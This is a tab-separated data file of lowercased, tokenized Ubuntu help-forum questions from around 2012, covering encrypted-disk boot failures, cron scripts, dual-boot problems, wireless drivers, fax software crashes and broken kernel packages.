233684	luks initramfs boot problem : `` /dev/mapper/ubuntu-root does not exist . '' how can i fix it using a backup ?	first time asker , relatively new to ubuntu/linux . have n't had much luck with the search function . please forgive the essay below - the problem is a bit unique , i think ... i 'm running 12.04 on a laptop ( with uefi bios ) , with full disk encryption set up up using the alternate cd . i recently made a backup image of the entire hard drive using dd , to an external usb hdd . having recently made some changes on the laptop , i tried to plug in the external usb clone to copy the files to it . despite getting the password prompt and having it appear in the disk utility as a logical volume group , it would not actually mount the external drive , saying it was 'not a mountable file system ' . tried it on my desktop , and it mounted up just fine ( once i installed lvm2 ) . using pvdisplay , i noticed that both the external drive and internal laptop drive had the same uuid ( duh , it 's a clone ! ) . so , on the desktop , i used pvchange -u to change the external drive 's uuid . plugged it into the laptop , alas , still no joy . gave up , turned off the laptop ( drive still plugged in ) , went and had dinner . came back , unplugged external drive from now-off laptop , tried to boot . problems ! it boots to the password prompt screen fine . enter the password , and after a long wait , it drops to an initramfs prompt , with the error : '' alert ! /dev/mapper/ubuntu-root does not exist . '' poop . if i reboot , and plug back in the external drive , it boots up , seemingly running root off the usb drive . i have tried the solution here , entering /dev/sda3 ( and yet more variants ) instead . no bingo , still get exactly the same messages . the fact i 'm using luks with a lvm seems to complicate things . i think i 've muddled a config file somewhere , probably by plugging in two drives with the same uuid ( stupid ! ) and now it thinks /root is on the external drive . i 'm stumped as to how to get it back .
233686	crontab and shell script not executing	anybody any suggestions on why my crontab and shell script is not running . i have chmod +x my shell script and added the following into crontab -e */5 * * * * bash cd /home/jclark/scrips/ipcheck/ & & ./ipcheck.sh ipcheck.sh then costits of the following : # ! /bin/sh curl http : //api.externalip.net/ip/ -o iprecord.txt although it does n't appear to be running ?
233687	dual-boot ubuntu 12.10 on uefi along windows 8 ( grub - error : ca n't find command drivemap )	hello after a successfull installation of ubuntu 12.10 amd64 , i am now unable to boot windows 8 . here are my actions : made room ( 15 gb ) for ubuntu from windows 8 computer managment boot ubuntu 12.10 amd64 liveusb with efi and with secure boot enabled created 2 new partitions at the end ( 13 gb ext4 root amd 2 gb swap ) selected windows 8 efi system partition to install bootloader grub gives me at boot : ubuntu ( works without problems ) windows recovery environment ( lots of errors ) windows 8 ( 2 error messages describe just below ) the 2 error messages are : error : ca n't find command drivemap . error : invalid efi file path
233691	problems in waking mars 12.04-1 64bit	the game waking mars is great however once you get mid way thru the game you get to an area where there is a large oval shaped stone that is supposed to be emitting a signal , a dialogue takes place between npc and yourself , your then supposed to use some sort of software to scan for the signal.. at this point the screen becomes solid colours with large coloured circles in the background and the mouse cursor becomes an x/y coordinate cross graph . you can hear the game in the background but can do nothing any more to interact with anything . the only thing at this point is to hard boot your pc as nothing else works ... .. i 've already put into 2 requests for help from tigerstyle and have yet to receive a response .
233694	can i download internet streaming songs from clementine	i use clementine on 12.04 as an audio player . when i am typing something on the search bar , it searches my local music library as well as internet . some times it shows songs which is not in my music library . so , i want to download songs which streaming from internet ( jamendo , icecast , google drive , ubuntuone , magnatune , jazzradio , di and much more ) . i can stream songs easily , but there is no option to download them to my computer . can anyone help me ? ?
233700	xubuntu 12.04 does not start	i have installed xubuntu 12.04 on my old computer recently and it worked fine for several days but now i have a big problem . i was in the process of installing a program and in the same time browsing the internet when the system somehow stopped responding . it crashed ( i.e . froze ) for a rather long time . i got annoyed ( which was really stupid ) and restarted but it did n't get to the log in screen . so i pressed the turn on button and held it for a while which turned everything off . then i turned the computer on again but it did n't get to the log in screen . i restarted a couple of times but with no effect . apparently xubuntu is not that robust as windows . now i am using the live cd to browse the internet and search for help . does anyone know a solution to my problem ?
233708	how do i package a python script for ubuntu ?	i have a python 3.2 script that i 'd like to package for ubuntu and debian . i 've certainly looked for documentation but i was n't sure that i was getting the latest and greatest/easiest methods . if someone with enough knowledge could please point me to the most recent guide on how to do this , it would be very useful to me . additionally , given a bit of what i have seen i might need a setup.py file too ? if so i need to learn about that too .
233709	used sources.list of 11.10 in 10.10 , how do i resolve a partial upgrade ?	recently i had to install some new packages in my server , but the version of ubuntu ( 10.10-maverick ) is not supported anymore . so , when i tried with apt-get update , i got lots of 404 not found messages . i did n't know i could change the sources.list using the old-releases addresses , so i changed my sources.list with the repositories in the next newer supported version ( 11.10 ) . i executed apt-get update , and it worked . then i installed the new packages without problems . i could see some of the old packages ( like libc , perl , etc ) were updated too . until now , everything seems to work fine , but i do n't know if this solution can give problems in the future . i 'm a little afraid about this , because the server is on production and many people depend on the services on it . i do n't want to install new packages using the new sources.list if i am going to get problems of libraries or similar . can you help me ? thanks in advance .
233712	how to create a live-usb for ubuntu from a lubuntu system	i am using lubuntu 12.04 on my pc . i want to install ubuntu 12.04 on my laptop . how do i create live-usb on lubuntu so that i can install ubuntu os to my laptop . edit : there 's no startup disc creator in lubuntu software center
233719	how can i make a live-usb without downloading the iso file ?	is there a way to create a live-usb without downloading the iso files from the internet . actually , i am using lubuntu on my pc but i do n't have the iso with me anymore ; so i wanted to know how can i create a live-usb from the installed os ( lubuntu ) on my system . i am trying to avoid downloading the isofile . any help is much appreciated .
233720	folders in home directory gone missing	please help , i am working on ubuntu 12.04 , yesterday one of my folder in home directory 'videos ' gone missing , it says- > could not find `` /home/arun/videos '' please check the spelling and try again . then today another folder this time music folder . leaving with same error notice . i have no idea . searched many forums to find any solution but no use . please suggest some solution or reason behind this disappearance of folders .
233721	how to send an email when laptop battery is low ?	is it possible to send an email to myself when the laptop is on low battery power ? i 'm always online with my android phone , but not always in front of the laptop , and sometimes i 'm missing the warning . perhaps a python or bash script ?
233726	ubuntu stuck at the startup screen ; how to get it working ?	after since i cancelled the updates in the last stage ( making changes to database < setting apparmour > ) and hard-rebooting my laptop with ubuntu 12.04 ( 64 bit ) is stuck at the startup screen : - the screen just before the username/password prompt with blinking dots . i have tried to run the previous versions but with no help . i ca n't even login to terminal . please help ; i do n't want to reinstall or loose my data . edit : - i 've been able to drop to the root shell from the recovery mode ; is there a way i can get the things normal ? any help is much appreciated .
233727	when installing ubunt 12.10 my computer freezes while trying to install the os	it is a gateway laptop , intel celeron , and 256mb of ram , i got this computer from my neighbor for free , and it has windows xp on it and i do not want windows , i 'd rather have ubuntu
233734	linking bash scripts	im looking for a way to link some bash scripts . kinda the way you include php . i wan na have my password.sh ask for pass > launch utility > utility checks to see if its correct > if so it will move to next step > .. some thing like that . i assume i would have top use a file to store my msd5 coded password ( im sure ill find a way to lock that down ) . so is this a possible task ? if so were should i start reading ? if now what would be a better lang to use for that function . but still using my bash as backend ?
233736	is there a way to play a sound file when the system wakes up after suspend ?	i would like to be able to enable some sound file to play whenever i wake up or suspend my laptop.is there any way i could do this ?
233740	configure python 2.7.3 interpreter in aptana studio ?	i have installed aptana studio on ubuntu and i do n't know when configuring a new python interpreter what folder/file to choose . i have python 2.7.3 already installed .
233741	remove user interaction from apt-get when installing/removing things in a script	i have a script which removes libreoffice and installs openoffice instead , how can i get apt-get to stop requiring the user to confirm this operation ? i only want this to happen in the script so what switches should i use ? i also want to reduce the output so it does n't clog up the console .
233743	flashbuilder 4 linux -- debugger disconnects after a while	i am running ubuntu 12.04 64bit , i have installed eclipse via the software center , flashbuilder for linux and the flash debugger plugin as decribed here . everything is working fine accept that the debugg session is just disconnected after a while . no errors , nothing , just end . here is the .log file of the project . i am using flash player 11.2 . what could that be ? any ideas how to fix this ? greetings ...
233744	cyborg rat 3 mouse and kubuntu 12.10 - i ca n't get the guides to work	i am trying to get my cyborg rat 3 mouse ( or r.a.t . 3 ) to work on kubuntu 12.10 64bit . there are plenty of guides to get it working ; they all say you need to add a few lines to the xorg.conf file . here is an example of one suggestion on ubuntu forums : # rat3 mouse section `` inputclass '' identifier `` mouse remap '' matchproduct `` saitek cyborg r.a.t.3 mouse '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 1 2 3 4 5 0 0 8 9 0 0 0 13 14 '' endsection the mentioned configuration does not work . after opening a few windows , the same issues occur again . i have lost track of all of the countless guides , which all suggest adding a variation of the above configuration . i do n't like this hit-or-miss game of searching for guides ; i have no clue what exactly that configuration is doing . i tried to look at the xorg website for information , but i ca n't find anything . the manual page for the xorg.conf file does n't even mention `` inputclass '' or `` buttonmapping '' . i am willing to try another configuration if it worked for you . i would really like to understand what is going on here , though . i would greatly appreciate an explanation of what those settings are doing , or a link to documentation so i can try to fix it on my own . i am going to further look up documentation and will edit this post when i find anything .
233745	import error when running update manager	it seems like i am getting some error related to python , but i am not sure why i am getting it . when i ran software updater ( in 12.10 ) from unity , it did n't even fire up . when i did this from the terminal : sudo update-manager i am getting this trace , and update manager does n't even open . i do n't think this is a bug , so i am asking it here . traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/repository/__init__.py '' , line 25 , in < module > from ..importer import dynamicimporter file `` /usr/lib/python3/dist-packages/gi/importer.py '' , line 24 , in < module > import logging importerror : no module named logging error in sys.excepthook : traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/apport_python_hook.py '' , line 64 , in apport_excepthook from apport.fileutils import likely_packaged , get_recent_crashes file `` /usr/lib/python3/dist-packages/apport/__init__.py '' , line 4 , in < module > from apport.report import report file `` /usr/lib/python3/dist-packages/apport/report.py '' , line 15 , in < module > import xml.dom , xml.dom.minidom importerror : no module named xml.dom original exception was : traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/repository/__init__.py '' , line 25 , in < module > from ..importer import dynamicimporter file `` /usr/lib/python3/dist-packages/gi/importer.py '' , line 24 , in < module > import logging importerror : no module named logging however , apt-get commands work fine . python seems to be installed properly ( ? ) , so i ca n't figure out what the trace is saying . any idea what can i do to get back update-manager working ?
233746	how to install amd proprietary driver correctly on ubuntu 12.10 ?	i would like to install amd driver , however , i 'm afraid because of past experiences after installing proprietary driver from additional drivers . everytime i installed be it ubuntu 11.04 or 12.04 , after rebooting , i get a blank screen , and do n't know how to get back . can anyone tell me , how to recover from a blank screen after installing amd driver if i get so ? thanks .
233747	installing ubuntu after win 8 , do i have to be careful ?	here is a system with win 8 on hdd1 . there is a second hdd and i thought i install ubuntu 12.10 on this one . im not using win 8 , but other people are . so after installing ubuntu , win 8 should be working also . do i have to be careful or just installing ubuntu on hdd2 and everything will work fine ? the bootloader will automaticly allow users to choose between win 8 and ubuntu ? any suggestions ? thx
233750	what is the username and password of the default user in the live dvd ?	i burned the 12.04 version on dvd . then booted from dvd drive . eventually i have a choice to install or try . i chose try . then a dialog came up asking for my username and password . what should i enter ?
233756	how to remove kde login screen ?	i accidentally installed kde on my ubuntu 12.04 machine the other day , to find i really do n't have a liking for it . i runned a apt-get command to remove the kde-full package , but programs like konsole , kmouth , and the kde login screen still remained on my machine . i 've looked at other posts on this community , but none of the methods have worked for me so far . somebody has recommended to use an apt-get command to remove all traces , but this what i recieved : virtual packages like 'kdepim-groupware ' ca n't be removed virtual packages like 'mysql-client-core-5.1 ' ca n't be removed virtual packages like 'mysql-server-core-5.1 ' ca n't be removed virtual packages like 'plasma-widget-kimpanel-backend-ibus ' ca n't be removed e : unable to locate package kdepim-wizards e : unable to locate package libattica0 e : unable to locate package libgps19 e : unable to locate package libkwineffects1abi2 e : unable to locate package libkworkspace4 e : unable to locate package libokularcore1 e : unable to locate package libplasmaclock4abi2 e : unable to locate package libtaskmanager4abi2 e : unable to locate package libzip1 i really do n't care , i currently use unity and gnome and i do n't mind if kde sits there . but , it would be nice to return to the default login screen .
233759	how do i change permissions ?	on my new install of ubuntu 12.10 , i keep having to enter passwords for everything ! i am the only user on this computer , and i am tired of having to enter all these passwords , can anyone help ?
233769	ubuntu 12.04 gnome issue , no clock is shown , strange starter icon can not be removed	i am finding nowhere a solution i am running ubuntu 12.04 and using gnome desktop , which i installed additionally . logging into classic gnome i see the following : what is this `` earth globe '' icon coming from ? seems to be named `` starter '' . it is configured to open a website , from my bookmarks . why is it not showing the time ? using dconf-editor i had no luck in answering the above questions . any idea ?
233772	problems installing awus036h adapter in ubuntu 12.10 , can connnect but no data transfer	any help would be really appreciated , problem is i finally got my brand new awus036h wireless usb dongle for x-mas and was so excited but so far i have been let down . i done a pretty good amount of research before choosing the device i chose because it was supposed to work out of the box with linux so i did n't get the newer versions of the alfa ( brand ) wifi adapter . i 'm running ubuntu 12.10 and the adapter has a realtek chipset . at first i could get it to connect and transfer but then the next day it would only connect , show many networks available ( with good signals ) and will connect - but when trying to surf it wo n't even load a web page . even though i hated to , i thought i would see what it would do in argh windows . so i got a old laptop out and loaded up windows 7 , installed the drivers it came with without moving the adapter from where it was before - so i would have a control test . it connected and was able to surf the internet like the signal strength suggested it would - [ it ] was pretty darn fast . so just cant understand why it will work that well under windows and wont with me in ubuntu 12.10 .. i know that others have it working flawlessly , [ so ] if anyone out there can hold my hand a bit and help me get this fixed i would really appreciate it ( i refuse to install windows. ) . thanks in advance .
233774	ubuntu 12.10 recognizes wireless , but does not connect ( intel centrino -n 1000 )	here is my problem , i just installed ubuntu 12.10 and everything went great , but when i try to connect to any wireless network it keeps connecting and after a while it says `` wireless network disconnected - your are now offline '' thank you so much . this is some information about my card and other stuff , i really do n't know much about the subject : ifconfig : eth0 link encap : ethernet hwaddr 64:31:50:7d : a2 : c8 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:224 errors:0 dropped:0 overruns:0 frame:0 tx packets:224 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:18400 ( 18.4 kb ) tx bytes:18400 ( 18.4 kb ) wlan0 link encap : ethernet hwaddr 8c : a9:82:06:2c:2a inet6 addr : fe80 : :8ea9:82ff : fe06:2c2a/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:108 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:29068 ( 29.0 kb ) iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : '' 60200516 '' mode : managed frequency:2.462 ghz access point : ec:55 : f9:38:3b : a3 bit rate=1 mb/s tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-27 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 02:00.0 network controller : intel corporation centrino wireless-n 1000 ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) lsusb : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 01:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) 02:00.0 network controller : intel corporation centrino wireless-n 1000 ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) rfkill_list : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : hp-bluetooth : bluetooth soft blocked : no hard blocked : no 3 : hp-wifi : wireless lan soft blocked : no hard blocked : no
233776	how do i install and apply a theme for cairodock ?	i just downloaded an os x theme for cairodock . i have already extracted it and put it in my documents folder ( just so i know where it is ) . i am completely clueless on how to apply it . thanks in advance !
233781	how can i convert my live ubuntu 12.04 installation into a bootable version for cd or usb ?	the subject tells it all . while i am seeing many people having difficulties with dual-boot ubuntu with windows 8 i came to this idea ( as my linux partition is too small for installing vmware converter 4.01 ) . can i `` back-up '' somehow my existing and running ubuntu 12.04 install into a bootable image file or iso , which i can then play-back with vmware player or convert into something bootable from a cd-rom or usb stick ?
233782	how does one install playonlinux ?	how do i install playonlinux on ubuntu ?
233783	how do i ensure that all of my drives are mounted when i boot up ?	here 's my situation : ubuntu 12.10 several drives/partitions : 200gb partition on ssd , 20gb partition on ssd for ubuntu , then some old hard drives and a dvd drive when i start up ubuntu , i try to open up something like sublime text . it will look for the last loaded project , which is on the 200gb ssd partition , but it will fail to find it . so in nautilus i check out /media/ [ user ] and i see that only the dvd drive is listed in there . however , in the left menu in nautilus it shows the drives are there . when i click on the 200gb ssd partition it seems to load it up for a second and then it shows the contents . then when i immediately return to /media/ [ user ] , the 200gb partition is there and all is right in the world . i assume this has something to do with mounting drives , but i 'm not sure . how do i get it to automatically load up without me having to navigate directly to the partition first ? thanks !
233795	triple monitor issue , 12.10 64bit	currently i have 3 monitors across 2 gpu 's ( nvidia 560ti ) , in ubuntu 12.04 i installed the additional drivers which allowed me to use the mosaic command to enable all three monitors . after upgrading to 12.10 i have read that additional drivers no longer work and i must use the software sources version , whenever i try these i am presented with a smaller resolution desktop with no gui ( albeit i do get 2 monitors ) , and thus have to resort back to the native drivers . any help appreciated , and i will provide whatever information you need .
233797	fax : efix segmentation fault	i 'm having some trouble getting efax to work on ubuntu server 12.04.1 lts sometimes fax send gives a 'terminated by signal ' error and sometimes it appears to work , but it always gives the warning : 'only read 0 byte ( s ) from input file , assuming text ' . nothing ever comes through on the other end . # fax send -- -- -- -- -- - fax-test.txt fax-test.txt.nnn is up-to-date efax : fri dec 28 13:45:46 2012 efax v 0.9a-001114 copyright 1999 ed casas efax : 45:46 warning : only read 0 byte ( s ) from input file , assuming text efax : 45:46 opened /dev/ttyacm0 efax : 45:46 warning : unexpected response `` ok '' efax : 45:48 using u.s. robotics 56k fax usb v1.1.0 in class 1 efax : 45:48 dialing t -- -- -- -- -- - efax : 46:03 connected efax : 46:05 received unknown efax : 46:05 warning : bit-reversed hdlc frame , reversing bit order efax : 46:05 remote id - > -- -- -- -- -- efax : 46:05 received dis - answering capabilities efax : 46:05 remote has no document ( s ) to send , and can receive efax : 46:05 local 196lpi 14.4kbps 8.5 '' /215mm any 1d - - 0ms efax : 46:05 remote 196lpi 9600bps 12 '' /303mm any 1d ecm-64 - 0ms efax : 46:05 session 196lpi 9600bps 8.5 '' /215mm any 1d - - 0ms efax : 46:06 sent tsi - caller id efax : 46:06 sent dcs - session format efax : 46:09 sent tcf - channel check of 1800 bytes efax : 46:11 received cfr - channel ok efax : 46:12 header : [ 2012/12/28 13:45 +1 778 478 0306 jon hulka p. 1/1 ] efax : 46:12 error : terminating on signal 8 efax : 46:12 failed - > fax-test.txt.001 efax : 46:13 done , returning 5 ( terminated by signal ) there were errors ( see t -- -- -- -- -- -.efax.log ) . # ls -l total 20 -rw-rw-r -- 1 jon jon 61 dec 24 13:43 fax-test.txt -rw-rw-r -- 1 jon jon 0 dec 28 13:37 fax-test.txt.001 i tried running 'fax make ' and 'efix ' and got segmentation fault for both : # strace -f efix fax-test.txt execve ( `` /usr/bin/efix '' , [ `` efix '' , `` fax-test.txt '' ] , [ /* 20 vars */ ] ) = 0 brk ( 0 ) = 0x915e000 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) mmap2 ( null , 8192 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb77d2000 access ( `` /etc/ld.so.preload '' , r_ok ) = -1 enoent ( no such file or directory ) open ( `` /etc/ld.so.cache '' , o_rdonly|o_cloexec ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=30093 , ... } ) = 0 mmap2 ( null , 30093 , prot_read , map_private , 3 , 0 ) = 0xb77ca000 close ( 3 ) = 0 access ( `` /etc/ld.so.nohwcap '' , f_ok ) = -1 enoent ( no such file or directory ) open ( `` /lib/i386-linux-gnu/libc.so.6 '' , o_rdonly|o_cloexec ) = 3 read ( 3 , `` \177elf\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\226\1\0004\0\0\0 '' ... , 512 ) = 512 fstat64 ( 3 , { st_mode=s_ifreg|0755 , st_size=1730024 , ... } ) = 0 mmap2 ( null , 1743580 , prot_read|prot_exec , map_private|map_denywrite , 3 , 0 ) = 0xb1b000 mprotect ( 0xcbe000 , 4096 , prot_none ) = 0 mmap2 ( 0xcbf000 , 12288 , prot_read|prot_write , map_private|map_fixed|map_denywrite , 3 , 0x1a3 ) = 0xcbf000 mmap2 ( 0xcc2000 , 10972 , prot_read|prot_write , map_private|map_fixed|map_anonymous , -1 , 0 ) = 0xcc2000 close ( 3 ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb77c9000 set_thread_area ( { entry_number : -1 - > 6 , base_addr:0xb77c9900 , limit:1048575 , seg_32bit:1 , contents:0 , read_exec_only:0 , limit_in_pages:1 , seg_not_present:0 , useable:1 } ) = 0 mprotect ( 0xcbf000 , 8192 , prot_read ) = 0 mprotect ( 0xae9000 , 4096 , prot_read ) = 0 munmap ( 0xb77ca000 , 30093 ) = 0 time ( null ) = 1356731733 brk ( 0 ) = 0x915e000 brk ( 0x917f000 ) = 0x917f000 open ( `` /etc/localtime '' , o_rdonly|o_cloexec ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=2875 , ... } ) = 0 fstat64 ( 3 , { st_mode=s_ifreg|0644 , st_size=2875 , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb77d1000 read ( 3 , `` tzif2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4\0\0\0\4\0\0\0\0 '' ... , 4096 ) = 2875 _llseek ( 3 , -24 , [ 2851 ] , seek_cur ) = 0 read ( 3 , `` \npst8pdt , m3.2.0 , m11.1.0\n '' , 4096 ) = 24 close ( 3 ) = 0 munmap ( 0xb77d1000 , 4096 ) = 0 write ( 2 , `` efix : fri dec 28 13:55:33 2012 e '' ... , 66efix : fri dec 28 13:55:33 2012 efix v 0.3 copyright 1999 ed casas ) = 66 open ( `` fax-test.txt '' , o_rdonly ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0664 , st_size=61 , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb77d1000 read ( 3 , `` this is a test fax . did it get t '' ... , 4096 ) = 61 read ( 3 , `` '' , 4096 ) = 0 _llseek ( 3 , 0 , [ 0 ] , seek_set ) = 0 read ( 3 , `` this is a test fax . did it get t '' ... , 4096 ) = 61 read ( 3 , `` '' , 4096 ) = 0 close ( 3 ) = 0 munmap ( 0xb77d1000 , 4096 ) = 0 open ( `` fax-test.txt '' , o_rdonly ) = 3 fstat64 ( 3 , { st_mode=s_ifreg|0664 , st_size=61 , ... } ) = 0 mmap2 ( null , 4096 , prot_read|prot_write , map_private|map_anonymous , -1 , 0 ) = 0xb77d1000 _llseek ( 3 , 0 , [ 0 ] , seek_set ) = 0 _llseek ( 1 , 0 , 0xbfbe4af0 , seek_set ) = -1 espipe ( illegal seek ) read ( 3 , `` this is a test fax . did it get t '' ... , 4096 ) = 61 -- - sigsegv ( segmentation fault ) @ 0 ( 0 ) -- - +++ killed by sigsegv ( core dumped ) +++ segmentation fault ( core dumped ) have i neglected to install something ?
233798	linux-image-generic seems to be broken	i 'm using ubuntu 12.04 . recently i ca n't install anything anymore . i always get the following error message : setting up linux-image-3.2.0-34-generic ( 3.2.0-34.53 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) use of chdir ( '' ) or chdir ( undef ) as chdir ( ) is deprecated at /var/lib/dpkg/inf/linux-image-3.2.0-34-generic.postinst line 235 . failed to symbolic-link /boot/initrd.img-3.2.0-34-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.2.0-34-generic.postinst line 614. dpkg : error processing linux-image-3.2.0-34-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-34-generic ; however : package linux-image-3.2.0-34-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.34.37 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured setting up dselect ( 1.16.1.2ubuntu7 ) ... no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-image-3.2.0-34-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) the output of dpkg -c is : the following packages have been unpacked but not yet configured . they must be configured using dpkg -- configure or the configure menu option in dselect for them to work : linux-image-generic generic linux kernel image linux-generic complete generic linux kernel the following packages are only half configured , probably due to problems configuring them the first time . the configuration should be retried using dpkg -- configure < package > or the configure menu option in dselect : linux-image-3.2.0-34-generic linux kernel image for version 3.2.0 on 32 bit x8 but dpkg -- configure linux-image-3.2.0-34-generic linux-image-generic linux-generic results in the following error message : setting up linux-image-3.2.0-34-generic ( 3.2.0-34.53 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) use of chdir ( '' ) or chdir ( undef ) as chdir ( ) is deprecated at /var/lib/dpkg/inf/linux-image-3.2.0-34-generic.postinst line 235 . failed to symbolic-link /boot/initrd.img-3.2.0-34-generic to initrd.img : file exists at /var/lib/dpkg/info/linux-image-3.2.0-34-generic.postinst line 614. dpkg : error processing linux-image-3.2.0-34-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 17 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-34-generic ; however : package linux-image-3.2.0-34-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.34.37 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-3.2.0-34-generic linux-image-generic linux-generic i would be very glad if someone could help me with this problem !
233799	ubuntu 12 live usb - boots fine but is not saving settings between sessions	i moved my ubuntu live from cd to usb and the performance is significantly faster . i also expected settings to be saved ( changes to the desktop , bookmarks in firefox , etc ... ) but that 's not happening . what extra step do i need to take to enable saving system and program settings between live usb sessions ? thanks
